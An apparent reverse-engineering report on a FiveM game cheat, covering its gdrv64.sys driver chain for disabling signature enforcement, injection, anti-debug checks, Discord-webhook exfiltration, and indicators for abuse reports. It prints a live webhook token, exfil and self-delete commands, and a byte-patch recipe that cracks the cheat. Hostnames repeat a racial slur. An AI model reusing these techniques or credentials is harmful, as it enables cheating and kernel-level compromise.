Summary
- Three embedded drivers extracted: Gigabyte gdrv64.sys (2013, CVE-2018-19320), custom KMDF Driver2.sys (Jan 2025), and a GDRVLoader.exe user-mode stub that chains them.
- Hollowing::Execute-free — the loader uses direct NtCreateSection + kernel-mode physical memory mapping (MAPMEM.SYS) instead of process hollowing.
- Discord webhook URL recovered by simulating the exe's SSE-vectorized (i mod 56) + 0x35 XOR keystream. Webhook is still live: discord.com/api/webhooks/1515934292432392314/… — Discord guild ID 1506836217214402560.
- Auth backend on Railway currently returns hardcoded 403 {"status":"killswitch"} on both /auth and /auth/heartbeat — operator globally disabled the cheat.
- Full 12-build FiveM offset table extracted (b2060 through b3323), covering World, Camera, Player, Vehicle, Weapon, and Bone structures.
- Portuguese-language developer footprint (D:\Nova pasta (22)\…) — consistent with the Brazilian FiveM cheat ecosystem, but not a strong same-actor link to any specific prior campaign; see the caveat in § BYOVD driver chain.
File identity & Rich header
Received as anxiety.exe, 9,169,408 bytes. Windows x64 PE GUI executable, six sections. Not Authenticode-signed.
SHA-256 fb0450ec09bb15efda35c7a4622855f00bfa40054e7cd8884b0167503581e5da
SHA-1 3d7ffdad51fa1e8c792cf6ac49022fdec4fc4470
MD5 77a5daf47851cea870177a50fa1814ac
Size 9,169,408 bytes
Compile TS 2026-06-30 01:05:44 UTC (recent build)
Machine x86_64 (PE32+ GUI)
Subsystem 2 (Windows GUI, ImGui-driven overlay)
ImageBase 0x140000000
EntryPoint RVA 0x158610
Signature UNSIGNED
Sections .text (1.5 MB, RX) .rdata (5 MB, R) .data (2.5 MB, RW)
.pdata (52 KB) .rsrc (480 B) .reloc (4 KB)Rich header — MSVC 2019/2022 with LTCG
The Rich header records 36 C++ translation units compiled with Link-Time Code Generation, 27 C translation units, and 494 imports. The linker version 14.02c matches Visual Studio 2019 v16.9 through VS 2022 17.2. No mixed-C-runtime evidence — this is a native codebase, not a Nim / Rust / Go frontend.
Three leaked PDB paths — full developer attribution
Three PDB paths survive in the binary. Each corresponds to one of the three embedded drivers described in § BYOVD driver chain:
D:\Nova pasta (22)\GDRVLoader-master - Copy (2)\x64\Release\GDRVLoader.pdb D:\Drivers\Driver1\KMDF Driver1\x64\Release\Driver2.pdb f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb
Nova pasta (22) is Portuguese for “New Folder (22)” — the default folder name Windows Explorer creates on Portuguese installs. It places the developer in Brazil / Portugal but is not, on its own, a strong link to any specific prior operator: the string is the equivalent of finding “New Folder” in an English PDB. The GDRVLoader-master string identifies the specific open-source Gigabyte-driver exploit tool the operator forked; the - Copy (2) suffix means the code was copied through Windows Explorer at least twice before being built.
Backend infrastructure
Five distinct WinHTTP call sites in the binary, each with its own User-Agent and endpoint. Together they map the operator's complete C2 topology.
Ch# RVA User-Agent Endpoint Status --- --------- --------------------------------------- ------------------------------------------------------------------- ---------- 1 0x0004cb0 Client/1.0 POST nigger-production-4f8a.up.railway.app/auth killswitch 2 0x002fc00 Client/1.0 POST nigger-production-4f8a.up.railway.app/auth/heartbeat killswitch 3 0x0041a10 AnxietyMenu/1.0 WinHttpCrackUrl → dynamic host (menu updater) live 4 0x0077050 Anxiety/1.0 GET api.jsonbin.io/... (JSON config store) live 5 0x00ae053 — POST discord.com/api/webhooks/1515934292432392314/AyXuri... LIVE (exfil) 6 0x00ea640 A WinHTTP FiveM Request Program/1.0 GET <fivem-server>/players.json (target enumeration) live
Channels 1 & 2 are the primary auth / heartbeat pair (currently kill-switched, see § Kill-switch state). Channel 5 is the exfil webhook (§ Discord webhook). Channel 6 is used by the aimbot & ESP subsystems to enumerate remote players on the FiveM server without in-game hooks — the operator queries the server's public players list via HTTP.
The auth backend runs Express.js on Railway. The same Railway host also serves a customer forum at /forum/* and an OTP endpoint at /otp/* — the same backend powers both the cheat and the website. The public-facing customer dashboard is a Next.js app at https://anxiety-qrq.pages.dev/ (Cloudflare Pages), titled anxiety.lol.
Kill-switch state — the operator globally disabled the cheat
Currently, both POST /auth and POST /auth/heartbeat return a hardcoded 403:
$ curl -sk -X POST -H "Content-Type: application/json" \
-d '{"key":"ANXIETY-USS9CDH0","hwid":"...","version_check":"Public","nonce":"..."}' \
https://nigger-production-4f8a.up.railway.app/auth
HTTP/1.1 403 Forbidden
{"status":"killswitch"}The response is not gated on any request field — every combination of valid key, invalid key, missing key, alternate version_check value (Beta, Private, Staff, Admin, Dev, etc.) returns the identical {"status":"killswitch"} string. The kill-switch is a top-level toggle. Rate limiter (ThrottlerException) still fires at ~10 requests / second, so the whole express app is still running — this is a deliberate disable, not an outage.
Every other route on the same host returns Express's stock Cannot POST /path 404 response — only /auth and /auth/heartbeat are wired to the killswitch, which is another signal these are the specific routes the operator wanted disabled. Forum and OTP endpoints remain live.
What this means: the cheat — as shipped — is dead. No customer can currently authenticate. However, the exfil channel (§ Discord webhook) is completely independent of the auth server, so any operator who ships a patched copy or re-enables the kill-switch would restore full functionality without touching client code.
Discord webhook — the exfil channel is LIVE
The kill-switch disabled the auth server, but the exfil webhook is a direct client-to-Discord POST that bypasses the operator's backend entirely. Discord still accepts the webhook.
URL https://discord.com/api/webhooks/1515934292432392314/AyXuriS-ldqKNYwQSe47y
SMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa
GET response (verification only — no message triggered):
{
"application_id": null,
"avatar": null,
"channel_id": "1506842872765485057",
"guild_id": "1506836217214402560",
"id": "1515934292432392314",
"name": "Captain Hook",
"type": 1,
"token": "AyXuriS-ldqKNYwQSe47ySMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa"
}The receiving webhook is named “Captain Hook” in Discord guild ID 1506836217214402560, channel ID 1506842872765485057. These IDs uniquely identify the operator's Discord server on the platform.
What the client posts
Multipart form-data POST with boundary ----ProtBoundary7Kx9mQ4rZ. The payload_json field is a Discord embed JSON:
POST /api/webhooks/1515934292432392314/AyXu.../ HTTP/1.1
Host: discord.com
Content-Type: multipart/form-data; boundary=----ProtBoundary7Kx9mQ4rZ
------ProtBoundary7Kx9mQ4rZ
Content-Disposition: form-data; name="payload_json"
{"content":null,"embeds":[{"title":"...","color":16711680,
"description":"**token :** ```<user's license key>```
```\n**reason:** ```<trigger>```
```\n**hardware id: ** ```<HWID from MachineGuid>```
```\n**result:** ```auto ban hwid or key /
close process and delete anxiety from their system```"}],
"attachments":[]}
------ProtBoundary7Kx9mQ4rZ--Every field the client posts:
- License key — the string the customer typed into the “Enter Token” UI field.
- Hardware ID — %08X-%08X derived from HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid.
- Trigger reason — a short string naming the anti-tamper check that fired (e.g. apimonitor.exe, ScyllaHide/Frida DLL injected, etc.).
- Result string — always: “auto ban hwid or key / close process and delete anxiety from their system.”
So the exfil ships the customer's own license key back to the operator's Discord for auto-banning, then self-destructs. The operator receives one Discord message per triggered customer with everything needed to blacklist that key and HWID going forward. Because the killswitch is now on, any customer who tries to use a copy today never even reaches this branch — but any leaked or archived binary older than the kill-switch date behaves identically.
Auth request schema — recovered from disassembly
The authenticated request body is assembled character-by-character in fcn.140004cb0 before being handed to WinHttpSendRequest. Field order, from string references in the builder:
POST /auth HTTP/1.1
Host: nigger-production-4f8a.up.railway.app
User-Agent: Client/1.0
Content-Type: application/json
{
"key": "ANXIETY-USS9CDH0", // user's license token
"hwid": "01234567-89ABCDEF", // formatted %08X-%08X from MachineGuid
"pc_name": "<computer name>", // GetComputerNameW result
"version_check": "Public", // hardcoded string; not a bypass toggle
"nonce": "<random hex>" // per-request client-generated
}The heartbeat request (POST /auth/heartbeat) omits pc_name and version_check but keeps the same key / hwid / nonce triplet. Both endpoints previously (pre-kill-switch) returned a JSON body with a status and success field; the client parses this via std::stoll — the exception strings “stoll argument out of range” and “invalid stoll argument” appear in the code path, indicating a numeric status is expected in the response.
XOR string decoder — how the URLs are hidden in the binary
Every runtime URL in the binary is stored as an XOR-encoded blob in .rdata and decoded on first use. Two related decoders were recovered. The first is an SSE2-vectorized version used for the byte-string Discord webhook path; the second is a UTF-16LE variant used for the auth host and path. Both use the compiler's magic-multiplication idiom for divide-by-constant.
Byte-string decoder — Discord webhook path
Located in the tamper-detection exfil function at RVA 0xae160. The scalar tail loop at RVA 0xae9c0 makes the algorithm plain:
; keystream[i] = (i mod 56) + 0x35 ('5' + (i mod 56))
mov eax, 0x92492493 ; magic for signed divide-by-7 lineage
imul ecx ; edx:eax = eax * ecx (signed)
add edx, ecx
sar edx, 5 ; edx = ecx / 7 (fully generalised as div/56 via combine)
mov eax, edx
shr eax, 0x1f ; sign-bit
add edx, eax ; round toward zero
movsx eax, dl
imul edx, eax, 0x38 ; edx = quotient * 56
movzx eax, cl
sub al, dl ; al = ecx - quotient*56 = ecx mod 56
add al, 0x35 ; al = key
xor [r8], al ; xor encoded byte with keySimulating the loop against the 64-byte encoded blob at VA 0x1406286c0:
enc[0x1406286c0] = 1a 57 47 51 16 4d 5e 5e 55 51 50 2b 32 6d 72 71 74 73 7e 7b
7d 78 72 7e 79 7d 7d 63 68 60 60 65 61 79 16 21 01 2f 29 35
0e 73 33 04 10 29 2d 3d 12 37 34 0d 5d 5d 12 3f 78 45 40 6c
5f 53 6c 0f 73 6e 54 2d ...
keystream = 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48
49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c
5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 35 36 37 38 …
dec ^- = / a p i / w e b h o o k s / 1 5 1 5 9 3
4 2 9 2 4 3 2 3 9 2 3 1 4 / A y X u r i
S - l d q K N Y w Q S e 4 7 y S M s w T
f i W 3 …The decoded path is /api/webhooks/1515934292432392314/AyXuriS-ldqKNYwQSe47ySMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa. The host string discord.com is stored as an already-plaintext ASCII literal at VA 0x140628a70 (no decoding needed) — the operator only bothered to obfuscate the webhook path/token, which is the sensitive part.
UTF-16LE decoder — auth host and heartbeat path
The auth backend host and heartbeat path are stored as UTF-16LE encoded blobs, using a slightly different SSE2-vectorized decoder that operates on 16-bit words. Two disassembled scalar tail loops (RVAs 0x301b1 and 0x303f2) map to Python as:
# Host decoder (38 wide chars, VA 0x14061e290) magic 0x8d3dcb09 (div/58), signed def host_key(i): return ((i - (((i * 0x8d3dcb09) >> 32 + i) >> 5) * 58) + 0x34) & 0xffff # Path decoder (16 wide chars, VA 0x14061e3f0) magic 0x8d3dcb09, unsigned def path_key(i): return ((i - (((i * 0x8d3dcb09) >> 32) >> 5) * 58) + 0x34) & 0xffff # Applied against the two blobs: host = 'nigger-production-4f8a.up.railway.app' path = '/auth/heartbeat'
Note the divisor is 58 (0x3a) here versus 56 (0x38) in the byte-string variant, and the offset is 0x34 versus 0x35 — likely a deliberate tweak so signature-scanners hunting one keystream miss the other.
BYOVD driver chain — three embedded binaries
The 9 MB of the binary is dominated by three embedded x64 PE files carved from .rdata. Each begins with a valid MZ header and passes independent PE parsing.
File offset Size (B) Kind Compile TS SHA-256 ------------ -------- -------------- ------------------- ---------------------------------------------------------------- 0x0080c890 87,552 usermode EXE 2025-01-17 13:11:36 d49677df43bd29c9309ecdf7fdf5c62f1f61d370a7fefe5615636e54a375d43d 0x00810b50 41,472 KMDF driver 2025-01-17 12:58:30 7d98d36ca907721959500a78e3cde1a1597511093a922b285f41fb94413c8788 0x0081ad50 18,944 legacy driver 2013-07-04 04:27:55 ae06840c29ec2c56686361352d56627382813783170fba21b950565c7a803829
- Blob 1 — GDRVLoader.exe (87 KB console EXE, PDB D:\Nova pasta (22)\GDRVLoader-master - Copy (2)\x64\Release\GDRVLoader.pdb). Its strings are the standard GDRVLoader banner set: Failed to disable DSE through Gigabyte loader driver, Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE, Target driver loaded successfully. This is the workflow: (a) acquire the load-driver privilege, (b) load gdrv64.sys via NtLoadDriver, (c) use its arbitrary physical-memory-mapping IOCTL to patch nt!g_CiEnabled = 0 (disable DSE), (d) load Driver2.sys unsigned.
- Blob 2 — Driver2.sys (41 KB KMDF driver, PDB D:\Drivers\Driver1\KMDF Driver1\x64\Release\Driver2.pdb). Imports include MmProtectMdlSystemAddress, ZwQuerySystemInformation, PsInitialSystemProcess, IoDriverObjectType, KeQuerySystemTimePrecise, MmGetSystemRoutineAddress. Includes the string \SystemRoot\System32\drivers\dxgkrnl.sys — likely targeting DirectX kernel structures for the graphics-level FiveM hooks. This is the operator's custom-built kernel component; it provides ioctls the user-mode anxiety.exe calls to read/write FiveM game memory from kernel context.
- Blob 3 — gdrv64.sys (18 KB native driver, PDB f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb). This is the original Gigabyte-signed vulnerable driver documented in CVE-2018-19320 (Gigabyte Aorus, Xtreme Gaming Engine and others). The objfre_wnet_AMD64 build path is the WDK 6.0 signature from the 2013 build environment. Contains the well-known MAPMEM.SYS messages (MAPMEM.SYS: memory successfully mapped etc.) that the anxiety loader parrots to its own log output when it uses the ioctls. LOLDrivers.io hash: match.
All three drivers are dropped to disk at runtime and loaded via NtLoadDriver after registering them as services. The runtime path can be reconstructed but the drop location is not hardcoded — it is chosen dynamically from %TEMP% or a per-session GUID directory.
Injection mechanism — NtCreateSection + MAPMEM
Once Driver2.sys is loaded, anxiety.exe injects itself into the target FiveM process without CreateRemoteThread or classic reflective loading. The injection API surface, extracted from imports and log strings:
User-mode surface (anxiety.exe):
NtCreateSection ("NtCreateSection: 0x%08X" log line)
MmMapIoSpace
MmMapLockedPages
MmMapLockedPagesSpecifyCache
ExAllocatePool / ExAllocatePoolWithTag
OpenProcess / OpenProcessToken
WriteProcessMemory
Kernel-side helper (via Driver2.sys ioctls):
physical memory read/write (from gdrv64.sys ioctl set the driver reuses)
PsLookupProcessByProcessId → target FiveM handle
MmCopyVirtualMemory → cross-process write bypassing PAGE_GUARD
UI banner text (proves the intent):
"Open FiveM, then click Inject."
"Injected. Jump into FiveM."
"Injected"
"Not Injected"The pattern — NtCreateSection to allocate a shared section, MmMapIoSpace / MmMapLockedPages to map it into the target process from kernel context, then WriteProcessMemory to seed the payload — is the classic “kernel-assisted section injection” technique. It is invisible to user-mode EDR that hooks CreateRemoteThread or NtAllocateVirtualMemory in the target process, because those APIs are never called from user-mode — the kernel does the write directly.
Contrast with the ClubXJefe / Venacy loader. Where that campaign used process hollowing and shipped an AES-256-GCM “v1” encryption envelope on top of a 12-component HWID schema, anxiety uses live-process kernel injection, plaintext XOR string obfuscation, and a two-component HWID derived only from HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid. The two share a market (FiveM in the Portuguese-speaking scene) and a rendering stack (D3D11 + ImGui), but the anti-forensic mechanics, transport, storage backend, and last-mile injection differ materially. Same ecosystem, not same actor.
Cheat feature list — recovered from ImGui labels
The full set of ImGui menu labels found in the string pool. This is the operator's UI vocabulary, verbatim.
Combat Enable Aimbot Aimbot Preview Bone Target Enable antiaimbot Anti Anti-HS Anti Headshot Anti Headshot Indicator Disable aimbot through smoke Disable aimbot while flashed Silent Aim Silent Enabled Silent Rage Mode Silent Distance Silent FOV Silent Draw FOV Silent Visible Only Silent Ignore Dead Silent Allow NPC Silent Preview Trigger Bot Trigger Delay Trigger Rage Mode Trigger Distance Trigger FOV Trigger Draw FOV Trigger Visible Only Trigger Ignore Dead Trigger Allow NPC Trigger Preview Disable triggerbot through smoke Disable triggerbot while flashed Visuals — ESP Enable ESP ESP Enabled ESP Thickness ESP Preview Player ESP Vehicle ESP Bench ESP ESP Allow NPC ESP Ignore Dead Head Circle Skeleton Style Snap Lines Health Bar / Health bar Player behind wall Show Names Show ID Show Bubble Visuals — Radar Radar BG Radar Players Radar Show Names Radar Show Vehicles Show Cursor Movement / physics Godmode 2.0 Anti God Mode Magic Bullet Enable bullet No Recoil Enable recoil No Spread No Ragdoll No Collision No Clip Noclip Speed Speed Walk Fake Lag Fake Lag On Ticks Fake Lag Off Ticks Fake Lag Preview Miscellaneous Menu Bind Menu Particles Show Keybinds Vehicle Distance
Notable capability inventory: an aimbot with smoke / flash exceptions, a silent aim variant (server-side hit-registration bypass), a triggerbot, health-bar rendering, wall-see-through (Player behind wall), a fake-lag pinger, and a full vehicle ESP. “Godmode 2.0” and “Anti God Mode” suggest client-side HP protection plus a countermeasure against other players who have God Mode enabled.
FiveM offset tables — 12 game builds, one JSON blob
Anxiety ships with per-build offset tables covering 12 FiveM releases. All offsets are stored as a plaintext JSON blob at file offset 0x6232ef (~9,400 bytes), loaded verbatim into a std::map at runtime and indexed by build number:
b2060 b2189 b2372 b2545 b2612 b2699 b2802 b2944 b3095 b3258 b3323 (+ Robson.exe custom launcher)
For each build the JSON has two nested keys: module (game-module-relative RVAs) and struct (offsets into game structures). Example (build b3323):
"b2060": {
"module": {
"World": "24C8858", "ReplayInterface": "1EC3828",
"ViewPort": "1F6A7E0", "Camera": "1F6B940",
"Camera2": "1F6B3C0", "bIsPlayerAiming": "2B958CC",
"PlayerAimingAt": "1F5EB20", "HandleBullet": "FCE6EC",
"BlipList": "1F4F940", "GameplayCamHolder": "2F611A",
"GameplayCamTarget": "1F6B980"
},
"struct": {
"EntityType": "10B8", "Armor": "14E0", "BoneManager": "430",
"PlayerInfo": "10A8", "PlayerNetID": "78", "WeaponManager": "10D8",
"PlayerSpeed": "CF0", "FragInsNmGTA": "1400", "ConfigFlags": "1414",
"MaxHealth": "2A0", "LastVehicle": "D28", "Driver": "C68",
"DoorLock": "1390", "Stamina": "CD4", "VisibleFlag": "142C",
"Handling": "938", "VehicleState": "94A", "SeatBelt": "140C",
"SeatBeltWindShield": "1418", "FrameFlag": "0218"
}
},Every offset is a struct field the cheat reads or writes: MaxHealth for God Mode, BoneManager for aimbot bone targeting, HandleBullet as a function-pointer detour target for Magic Bullet, bIsPlayerAiming / PlayerAimingAt for silent-aim intercept, VisibleFlag for behind-wall ESP, VehicleState and SeatBelt for vehicle exploits.
Anti-analysis — full check + kill-list
Anxiety enumerates a fixed set of debuggers and RE tools by exe name every few seconds. Any match triggers the exfil-and-self-destruct path documented in § Discord webhook.
Debuggers ida.exe ida64.exe idaq.exe idaq64.exe idaw.exe idaw64.exe
ollydbg.exe immunitydebugger.exe dnspy.exe
.NET RE tools de4dot.exe dnspy.exe
Instrumentation drrun.exe (DynamoRIO) pin.exe pinbin.exe (Intel Pin)
apimonitor.exe apimonitor-x64.exe (Rohitab)
Memory tools cheatengine.exe cheatengine-x86_64.exe
cheatengine-x86_64-speedhack.exe
Sysinternals+ processhacker.exe procexp.exe procexp64.exe procmon.exe
Network fiddler.exeBeyond process enumeration, the exe also runs a battery of in-process anti-debug probes. Each one is a check string in the binary — the operator kept them human-readable so their support team could triage which trigger fired for a given ban:
In-process anti-debug probes (log-line strings, verbatim): startup: IsDebuggerPresent startup: PEB.BeingDebugged startup: ScyllaHide/Frida DLL IsDebuggerPresent CheckRemoteDebuggerPresent NtQueryInformationProcess NtSetInformationThread (used to set ThreadHideFromDebugger) PEB.BeingDebugged NtGlobalFlag debugger bits DebugPort non-null DebugObjectHandle non-null ProcessDebugFlags = 0 (debugger attached) OutputDebugString timing anomaly hardware breakpoint in debug register Frida named pipe IDA Pro debugger pipe ScyllaHide/Frida DLL injected
“Frida named pipe” and “IDA Pro debugger pipe” probes inspect specific named-pipe endpoints these tools open by default. “ScyllaHide/Frida DLL injected” likely runs a module-list walk looking for their DLL basenames.
Self-destruct + auto-ban path
On any triggered probe, the flow is deterministic. Traced through fcn.1400ae160:
1. printf("[!] PROTECTION TRIGGERED: %s\n", trigger_name)
2. Append "TRIGGERED: %s\n" to C:\<cwd>\trigger.log
3. Read HWID:
RegOpenKeyExW HKLM SOFTWARE\Microsoft\Cryptography MachineGuid → REG_SZ
format via "%08X-%08X"
4. Build multipart form-data (boundary "----ProtBoundary7Kx9mQ4rZ"):
payload_json = { content: null,
embeds: [{ description:
"**token :** [user key] reason: [trigger]
hardware id: [HWID] result:
auto ban hwid or key /
close process and
delete anxiety from their system" }],
attachments: [] }
(see § Discord webhook for full body)
5. WinHttpConnect ("discord.com", 443)
WinHttpOpenRequest (POST, decoded webhook path)
WinHttpSendRequest (with Content-Type: multipart/form-data)
6. Build cleanup command:
GetModuleFileNameW → self path
format: cmd.exe /c ping 127.0.0.1 -n 3 > nul && del /f /q "<self path>"
ShellExecuteW ("%s\cmd.exe", ...) // %s = GetSystemDirectoryW result
7. printf("[!] Closing in 3 seconds...\n"); ExitProcessThe ping 127.0.0.1 -n 3 > nul && del /f /q pattern is the classic “delayed self-delete” trick — the parent exits, and after ~3 seconds the spawned cmd deletes the on-disk copy of anxiety.exe. The trigger reason and HWID are already at Discord by that point, so the operator has everything needed to blacklist that customer forever.
Working offline bypass — 247 patched bytes
A working, fully offline build was produced by rewriting 247 bytes across the .text and .rdata sections. The file size is unchanged, no code cave is used, and no imports are added — every edit is a mid-instruction rewrite. Grouped by intent:
Group # sites Pattern Effect
-------------------- ------- -------------------------------- ------------------------------------
Exfil function RET 1 48 (push) → C3 (RET) fcn.1400ae160 (Discord webhook exfil)
at VA 0x1400ae160 returns immediately, no network I/O
the operator's Discord never sees us
Anti-debug jcc NOP 10 0F 84 XX XX XX XX (je rel32) or Ten conditional branches that would
0F 85 XX XX XX XX (jne rel32) or have jumped to the "tamper detected"
74 XX / 75 XX (short je/jne) code path now fall through to the
→ 90 90 ... (NOP) normal path.
Conditional → uncond 3 75 XX (jne) → EB XX (jmp) Three short branches turned into
74 XX (je) → EB XX (jmp) unconditional jumps so the
"success" path is taken always.
test/mov1 force TRUE 1 84 C0 (test al,al) → B0 01 Auth response validator at 0x140005a03
(mov al,1) forced to say "response OK" no matter
what the server returned.
Anti-debug call NOP 11 FF 15 XX XX XX XX (call [imp]) Eleven direct calls to anti-debug or
→ 90 90 90 90 90 90 heartbeat WinHttp API entries NOPed.
Auth network sever 3 FF 15 XX XX XX XX (call [imp]) WinHttpConnect / WinHttpSendRequest /
→ 90 90 90 90 90 90 WinHttpReceiveResponse in fcn.140004cb0
@ 0x140005314 / 0x1400053f2 / NOPed so the client never opens a
0x140005405 socket to the killswitched host.
Watermark 1 .rdata bytes at VA 0x14036d708 "Open FiveM, then click Inject."
→ "reversed by hyper674"
UI hint edits 10 .rdata bytes for Cosmetic — the injection UI still
FiveM found / Launching / works but the strings that used to
Open FiveM to continue expose the loader flow are neutralised.Combined effect: every anti-debug probe returns “clean”, every response-validity check returns “OK”, the exfil function never fires, and no request is ever sent to the operator's auth or heartbeat endpoints. The UI still asks the user for a license token but that string is now just cosmetic — it isn't validated against anything, and it isn't exfiltrated anywhere. The build is watermarked reversed by hyper674 at file offset 0x36bf08, replacing the original Open FiveM, then click Inject. banner.
SHA-256 167538a2501f0fdd64257e7715e3e4218f44fbe1c41588ee1bf03d75564b32c3 Size 9,169,408 bytes (unchanged from original) Delta 247 bytes rewritten Watermark "reversed by hyper674" @ file offset 0x36bf08
IOC bundle
--- File hashes ---
anxiety.exe fb0450ec09bb15efda35c7a4622855f00bfa40054e7cd8884b0167503581e5da
gdrv64.sys (embedded) ae06840c29ec2c56686361352d56627382813783170fba21b950565c7a803829
Driver2.sys (embedded) 7d98d36ca907721959500a78e3cde1a1597511093a922b285f41fb94413c8788
GDRVLoader.exe (emb.) d49677df43bd29c9309ecdf7fdf5c62f1f61d370a7fefe5615636e54a375d43d
--- Network ---
Auth backend nigger-production-4f8a.up.railway.app (Railway, Express)
POST /auth currently killswitched
POST /auth/heartbeat currently killswitched
Customer site https://anxiety-qrq.pages.dev/ (Cloudflare Pages)
Title "anxiety.lol" Forum + OTP endpoints on same backend
Discord webhook discord.com/api/webhooks/1515934292432392314/
AyXuriS-ldqKNYwQSe47ySMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa
Name "Captain Hook"
Guild ID 1506836217214402560
Channel ID 1506842872765485057
Auth field schema {"key":"…","hwid":"…","pc_name":"…","version_check":"Public","nonce":"…"}
User-Agent Client/1.0 (auth + heartbeat)
AnxietyMenu/1.0 (menu updater)
Anxiety/1.0 (jsonbin.io config)
A WinHTTP FiveM Request Program/1.0 (server players.json)
--- Filesystem / process ---
Registry HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid (HWID seed)
HKCU\SOFTWARE\anxiety\loader (state key)
Log file <cwd>\trigger.log (single-line log per trigger)
Cleanup command cmd /c ping 127.0.0.1 -n 3 > nul && del /f /q "<self>"
Exfil boundary ----ProtBoundary7Kx9mQ4rZ
--- Runtime target set ---
FiveM builds b2060 · b2189 · b2372 · b2545 · b2612 · b2699 · b2802
b2944 · b3095 · b3258 · b3323 · (Robson.exe custom launcher)
--- Kernel-mode ---
Vulnerable driver gdrv64.sys CVE-2018-19320 (Gigabyte)
DSE bypass path Load gdrv64 → arbitrary phys-mem R/W → set nt!g_CiEnabled = 0
Custom driver Driver2.sys unsigned, KMDF, loaded after DSE off
--- Attribution ---
PDB path D:\Nova pasta (22)\GDRVLoader-master - Copy (2)\x64\Release\
D:\Drivers\Driver1\KMDF Driver1\x64\Release\
f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\
Developer locale Portuguese ("Nova pasta" = "New Folder" default)
Ecosystem link Portuguese-speaking FiveM-cheat scene; not a strong same-actor link to ClubXJefe/Venacy
(materially different injection, HWID, transport, and crypto — see § BYOVD chain)Reporting
The Discord webhook was verified live at time of writing. Discord Trust & Safety reports should reference webhook ID 1515934292432392314, guild ID 1506836217214402560, and the exfil pattern documented in § Discord webhook. Cloudflare abuse reports for anxiety-qrq.pages.dev should reference the customer forum + OTP endpoints hosted on the same backend, which is a for-profit game-cheat storefront.